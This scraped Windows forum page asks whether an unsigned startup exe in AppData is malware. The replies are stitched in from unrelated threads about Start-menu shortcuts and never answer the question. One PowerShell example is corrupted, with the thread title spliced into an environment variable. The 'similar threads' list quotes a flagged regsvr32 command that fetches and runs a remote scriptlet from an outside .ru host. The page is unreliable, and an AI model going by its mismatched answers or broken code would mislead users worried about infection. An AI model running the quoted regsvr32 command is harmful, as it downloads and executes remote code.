Windows 10: Unrecognised exe file in start up menu: malware?

Discus and support Unrecognised exe file in start up menu: malware? in AntiVirus, Firewalls and System Security to solve the problem; This exe file is showing in my start up apps. It has no publisher information attached. Is it legitimate or malware?The file plus another similar file... Discussion in 'AntiVirus, Firewalls and System Security' started by Tim_C_, Mar 16, 2022.

1. Tim_C_ Win User

Unrecognised exe file in start up menu: malware?

This exe file is showing in my start up apps. It has no publisher information attached. Is it legitimate or malware?The file plus another similar file is in C:\Users\{username}\AppData\Roaming\Microsoft\Installer\

:)

Tim_C_, Mar 16, 2022

2. EXE files and Start menu

You can only put shortcuts on the menu.

Ztruker's suggestion should work fine.

Here's a tip (unrelated to the issue):
    Create a new folder on your desktop named dtIcons (any name will do),
    then drag all of the icons on your Desktop to that folder.
    Once you have the icons in the folder, you can leave it on your desktop (moving any new icons to that folder as they are created ) - you'll have to open the folder to access the icons of course
    -- OR --
    move the folder (as long as the file name chosen does not already exist in the location - rename it if necessary) off of your desktop to your User folder (any location you choose)
    then create a new toolbar on your Taskbar and point that to the folder holding your icons.
    this gives you a drop down menu of your icons that were cluttering up your Desktop.
    You can manually add shortcuts to the menu list (left hand pane).
    There are some considerations if you manually added the item to either All users menu > All apps or your personal menu > All apps. Win8 / Win10 menu keeps track of items on the menu. The easiest way to tell Windows that a new item is placed there is to create a shortcut anywhere BUT All apps and copy that shortcut to All apps.

You can also use PowerShell to 'touch' the object.

The PowerShell cmdlet below uses the non-existent contoso.lnk as an example.
    If your shortcut is in your personal menu, you will have to change the environment variable
    from
    $envUnrecognised exe file in start up menu: malware? :programdata
    to
    $env:appdata
    AND
    Change the file name of the shortcut from contoso.lnk to the file name of the shortcut you want to update

(ls "$envUnrecognised exe file in start up menu: malware? :programdata\microsoft\windows\start menu\programs\contoso.lnk").lastwritetime = get-date
    It really is easier to just create a new shortcut and copy it to the menu you want.
    There are a few instances where people have disabled UAC and that causes more headaches than it's worth. Set UAC to the default if it has been changed.

Unrecognised exe file in start up menu: malware? [​IMG]

Search and Indexing are tightly tied together - if you've modified your index locations, you'll need to revisit your settings. Make sure Start is included as a location in the index.
    If the object is not in an indexed location - Search might not find it.
    Search from Explorer will find it regardless of the index status.

Search for file names (Q1 report) or extensions xls
    If you search for Q1 report.xls - your results will not be what you expect.
    Lastly try this
    Press the WinKey [ *Start ] on your keyboard and start typing our search query
    The input box doesn't appear until you type the first character and the results are filtered as you type.

Slartybart, Mar 16, 2022
  3. EXE files and Start menu

Nice try :-(

Unfortunately, Windows 10 displays massive problems with .exe-files within the start menu. Neither searching for them nor pinning them to the start menu work.

Just have a look in those threads:

http://answers.microsoft.com/en-us/w...7-6c3339465037

http://answers.microsoft.com/en-us/w...5-ebfeadf0d82e

http://answers.microsoft.com/en-us/w...d-131dd2e15981

Can't search for .exe files in start menu? : Windows10

Regards

namelessrabbit, Mar 16, 2022
  4. prarial Win User

Impossible to starts some exe files!

hello everyone,

I need help as I have tried all of what i have found in this and other forums, whitout any success.
    Since a week icant start some exe files and i dont know why only some!
    i have appleied what was described in Restore Default File Type Associations in Windows 10 Windows 10 Customization Tutorials ,
    but no better results.
    I have scanned my laptop for virus or malwares, and its clean.
    for example i want start Acronis, then win10 say cant find the file even so i try to start it directly from the exe file!
    same if i want to start ACDSee and some others applications.

For others files its perfectly ok, like AVG PCtune; Malwarebytes, Microsoft Office and so many others.

I have also tried to install again the sotware which doesnt start but it is the same.

Some people suggested that possibly a dll have been modified, but how to find out?
    I hope someone will be able to help me as my next step would be to fully reinstall windows and all applications.

Thanks a lot for your help

Regards

prarial, Mar 16, 2022
Thema:

1. Unrecognised exe file in start up menu: malware? - Similar Threads - Unrecognised exe file

2. Exe Icons disappear on Start Menu

in Windows 10 BSOD Crashes and Debugging
    Exe Icons disappear on Start Menu: As shown in picture, all exe applications excluding those from Microsoft store disappears on start menu. Even disappear in all Apps. I have tried some methods such as sfc/scannow, delete iconcache create another user account etc., but none of them work so far.Anyone has...
  3. regsvr32.exe as Malware

in Windows 10 BSOD Crashes and Debugging
    regsvr32.exe as Malware: Hello Team, We are observing Malware as Cloud IOC: W32.COMScriptletAbuse.ioc from the file path C:\Windows\System32\regsvr32.exe /s /n /u /i:http://server2.aserdefa.ru/restore.xml scrobj.dll. Can we delete or Uninstall the file will it affect the OS. Please let me know...
  4. ss3svc64.exe at start up

in Windows 10 Customization
    ss3svc64.exe at start up: My ASUS PC was requesting ss3svc64.exe be allowed to make changes at start up. IT uninstalled sonic suite. Now I have no sound. Could that be because sonic suite was uninstalled?...
  5. is Excelcnv exe malware?

in AntiVirus, Firewalls and System Security
    is Excelcnv exe malware?: I have problems with my PC performance. Today I found a program file called excelcnv. I think it is malware but I am not sure. Can I delete this file? c:/programfiles(X86)/microsoftoffice/root/office16 Thank you....
  6. EXE files wont start

in Windows 10 Software and Apps
    EXE files wont start: Hello, guys! I have an HP Laptop running Windows 10 Media Center Edition (Joke, It is actually Home) x64 and I've just downloaded an application used for TV when I'm gone, but it won't start! I've edited the registry, Ran as an Administrator, I can't start safe mode, nothing...
  7. how to add an exe to the start menu as a tile.

in Windows 10 Support
    how to add an exe to the start menu as a tile.: I want to add exe's to the start menu as tiles. This also includes word templates that I have created. 113409
  8. Malware on start up

in AntiVirus, Firewalls and System Security
    Malware on start up: Hello Guys and gals *Smile, its been a while since i have been here , i have unknowingly installed a piece of malware / spyware, i have tried all the known removal process, and still unsuccessful i do have a backup of the C:\ folder. under the c:\ Properties. i was wondering...
  9. starting up a stand-alone .exe file during booting

in Windows 10 Performance & Maintenance
    starting up a stand-alone .exe file during booting: I have a stand-alone .exe file, which I would like to start automatically during booting. Putting a shortcut in the W10 startup folder does not do the job. Does this only work for installed programs? 39463
  10. EXE files and Start menu

in Windows 10 Support
    EXE files and Start menu: Is there any way I can put an .exe file on the Start menu? I know I can put a link to it on the desktop but that has too many icons on it already. Thank you. 22594